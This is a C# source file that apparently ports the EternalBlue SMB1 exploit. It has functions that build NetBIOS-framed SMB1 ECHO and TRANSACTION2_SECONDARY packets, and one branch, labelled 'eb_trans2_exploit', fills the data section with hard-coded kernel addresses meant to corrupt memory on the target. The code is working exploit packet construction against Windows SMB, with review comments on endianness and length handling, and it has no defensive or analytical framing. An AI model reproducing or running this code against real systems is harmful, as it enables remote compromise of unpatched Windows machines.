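/// <summary>
/// Prefixes <paramref name="pkt"/> with a 4-byte NetBIOS session header whose
/// length field carries <c>pkt.Length</c>.
/// </summary>
/// <param name="pkt">Payload to frame (SMB header plus body).</param>
/// <returns>Header bytes followed by the unchanged payload.</returns>
/// <exception cref="ArgumentNullException"><paramref name="pkt"/> is null.</exception>
/// <exception cref="ArgumentOutOfRangeException">
/// <paramref name="pkt"/> is longer than 0xFFFFFF bytes. The NetBIOS length field is only
/// 3 bytes wide; a larger value would silently spill into the message-type byte.
/// </exception>
static public byte[] SetNetBiosHeader(byte[] pkt)
{
    if (pkt is null)
    {
        throw new ArgumentNullException(nameof(pkt));
    }

    // The session header is one type byte followed by a 3-byte big-endian length.
    // MessageTypeAndSize is written as a single uint, so a length above 0xFFFFFF
    // would overwrite the type byte instead of failing loudly.
    const int MaxNetBiosLength = 0xFFFFFF;
    if (pkt.Length > MaxNetBiosLength)
    {
        throw new ArgumentOutOfRangeException(nameof(pkt), pkt.Length, "payload exceeds the 24-bit NetBIOS length field");
    }

    // Byte-reverse the host-order length so that, once the struct is serialized,
    // the four bytes come out as 0x00 (session message) then the length big-endian.
    // NOTE(review): this relies on a little-endian host; BitConverter.IsLittleEndian is not checked.
    uint size = (uint)pkt.Length;
    byte[] sizeBigEndian = BitConverter.GetBytes(size).Reverse().ToArray();

    NETBIOS_HEADER netbiosHeader = new NETBIOS_HEADER();
    netbiosHeader.MessageTypeAndSize = BitConverter.ToUInt32(sizeBigEndian, 0);

    byte[] headerBytes = GetBytes(netbiosHeader);
    return headerBytes.Concat(pkt).ToArray();
}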
/// <summary>
/// Builds an SMB1 ECHO request (command 0x2b) preceded by a NetBIOS session header
/// with a fixed, hard-coded MessageTypeAndSize (not derived from the payload length).
/// The data section is eleven 0x41 bytes followed by one 0x00 byte (12 bytes total).
/// </summary>
/// <param name="TID">Tree identifier copied into the SMB header.</param>
/// <param name="UID">User identifier copied into the SMB header.</param>
/// <returns>NetBIOS header + SMB header + echo request fields + data, as one byte array.</returns>
static public byte[] MakeSMB1EchoPacket(ushort TID, ushort UID)
{
    NETBIOS_HEADER nbHeader = new NETBIOS_HEADER { MessageTypeAndSize = 0x31000000 };

    SMB_HEADER smbHeader = new SMB_HEADER
    {
        protocol = 0x424d53ff,
        command = 0x2b,
        errorClass = 0x00,
        _reserved = 0x00,
        errorCode = 0x0000,
        flags = 0x98,
        flags2 = 0xc007,
        PIDHigh = 0x0000,
        SecurityFeatures = 0x0000000000000000,
        reserved = 0x0000,
        TID = TID,
        PIDLow = 0xfeff,
        UID = UID,
        MID = 0x0040
    };

    // Data section: 11 x 0x41 followed by a single 0x00 terminator.
    byte[] smbData = Enumerable.Repeat((byte)0x41, 11).Concat(new byte[] { 0x00 }).ToArray();

    // ByteCount reflects the data section size computed above.
    SMB_COM_ECHO_REQUEST echoRequest = new SMB_COM_ECHO_REQUEST
    {
        WordCount = 0x1,
        EchoSequenceNumber = 0x0001,
        ByteCount = (ushort)smbData.Length
    };

    // Assemble in wire order: NetBIOS header, SMB header, echo request fields, data.
    List<byte> frame = new List<byte>();
    frame.AddRange(GetBytes(nbHeader));
    frame.AddRange(GetBytes(smbHeader));
    frame.AddRange(GetBytes(echoRequest));
    frame.AddRange(smbData);
    return frame.ToArray();
}
/// <summary>
/// Builds an SMB1 TRANSACTION2_SECONDARY request (command 0x33) wrapped in a NetBIOS
/// session header with a hard-coded MessageTypeAndSize, followed by a 4096-byte data
/// section whose contents are selected by <paramref name="type"/>. Every branch below
/// appends exactly 0x1000 bytes, which matches the TotalDataCount, DataCout and
/// ByteCount fields set in the request.
/// </summary>
/// <param name="TID">Tree identifier placed in the SMB header.</param>
/// <param name="UID">User identifier placed in the SMB header.</param>
/// <param name="type">Selects the data section: "eb_trans2_exploit", "eb_trans2_zero",
/// or any other value (plain 0x41 fill). Must not be null — <c>type.Equals</c> would
/// throw NullReferenceException.</param>
/// <param name="time">Scaled as <c>time * 16 + 3</c>; only the low byte of that value is
/// used, so larger values of <paramref name="time"/> wrap silently.</param>
/// <returns>NetBIOS header + SMB header + TRANSACTION2_SECONDARY fields + 4096-byte data section.</returns>
static public byte[] MakeSMB1Trans2ExploitPacket(ushort TID, ushort UID, string type, int time)
{
    // Fixed NetBIOS length field; unlike SetNetBiosHeader it is not derived from the payload.
    NETBIOS_HEADER NTHeader = new NETBIOS_HEADER { MessageTypeAndSize = 0x35100000 };
    SMB_HEADER header = new SMB_HEADER
    {
        protocol = 0x424d53ff,
        command = 0x33,
        errorClass = 0x00,
        _reserved = 0x00,
        errorCode = 0x0000,
        flags = 0x18,
        flags2 = 0xc007,
        PIDHigh = 0x0000,
        SecurityFeatures = 0x0000000000000000,
        reserved = 0x0000,
        TID = TID,
        PIDLow = 0xfeff,
        UID = UID,
        MID = 0x0040
    };
    byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray();

    SMB_COM_TRANSACTION2_SECONDARY_REQUEST transaction2SecondaryRequest = new SMB_COM_TRANSACTION2_SECONDARY_REQUEST
    {
        WordCount = 0x09,
        TotalParameterCount = 0x0102,
        TotalDataCount = 0x1000,
        ParameterCount = 0x0000,
        ParameterOffset = 0x0000,
        ParameterDisplacement = 0x0000,
        DataCout = 0x1000,
        DataOffset = 0x0035,
        DataDisplacement = 0x0000, // placeholder; overwritten below from `time`
        FID = 0x0000,
        ByteCount = 0x1000
    };

    // DataDisplacement is rebuilt from two bytes: a fixed 0xd0 and the low byte of timeout.
    // NOTE(review): ToUInt16 is host-endian; on a little-endian host this yields
    // (lowByte << 8) | 0xd0. BitConverter.IsLittleEndian is not checked.
    int timeout = (time * 16) + 3;
    transaction2SecondaryRequest.DataDisplacement = BitConverter.ToUInt16(new byte[] { 0xd0, BitConverter.GetBytes(timeout)[0] }, 0);

    // Merge the SMB header with the transaction2SecondaryRequest fields.
    byte[] transaction2SecondaryRequestBytes = GetBytes(transaction2SecondaryRequest);
    byte[] pkt = headerBytes.Concat(transaction2SecondaryRequestBytes).ToArray();

    if (type.Equals("eb_trans2_exploit"))
    {
        // Data section: the segments below total 4096 bytes.
        List<byte> SMBData = new List<byte>();
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2957));
        SMBData.AddRange(new List<byte>() { 0x80, 0x00, 0xa8, 0x00 });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 16));
        SMBData.AddRange(new List<byte>() { 0xff, 0xff });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 6));
        SMBData.AddRange(new List<byte>() { 0xff, 0xff });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 22));
        SMBData.AddRange(new List<byte>() { 0x00, 0xf1, 0xdf, 0xff }); // x86 addresses
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 8));
        SMBData.AddRange(new List<byte>() { 0x20, 0xf0, 0xdf, 0xff, 0x00, 0xf1, 0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0x60, 0x00, 0x04, 0x10 });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
        SMBData.AddRange(new List<byte>() { 0x80, 0xef, 0xdf, 0xff });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
        SMBData.AddRange(new List<byte>() { 0x10, 0x00, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x18, 0x01, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x10));
        SMBData.AddRange(new List<byte>() { 0x60, 0x00, 0x04, 0x10 });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xc));
        SMBData.AddRange(new List<byte>() { 0x90, 0xff, 0xcf, 0xff, 0xff, 0xff, 0xff, 0xff });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x8));
        SMBData.AddRange(new List<byte>() { 0x80, 0x10 });
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xe));
        SMBData.AddRange(new List<byte>() { 0x39, 0xbb });
        SMBData.AddRange(Enumerable.Repeat((byte)0x41, 965));
        pkt = pkt.Concat(SMBData.ToArray()).ToArray();
        return (pkt);
    }

    if (type.Equals("eb_trans2_zero"))
    {
        // Data section: 2055 x 0x00, 0x83 0xf3, 2039 x 0x41 (4096 bytes).
        List<byte> SMBData = new List<byte>();
        SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2055));
        SMBData.Add(0x83);
        SMBData.Add(0xf3);
        SMBData.AddRange(Enumerable.Repeat((byte)0x41, 2039));
        pkt = pkt.Concat(SMBData.ToArray()).ToArray();
        // Collect it all.
        return (pkt);
    }
    else
    {
        // Fallback for any other `type` value: 4096 x 0x41.
        List<byte> SMBData = new List<byte>();
        SMBData.AddRange(Enumerable.Repeat((byte)0x41, 4096));
        pkt = pkt.Concat(SMBData.ToArray()).ToArray();
        // Collect it all.
    }
    // Only reached through the else branch above; the two named types return early.
    return (pkt);
}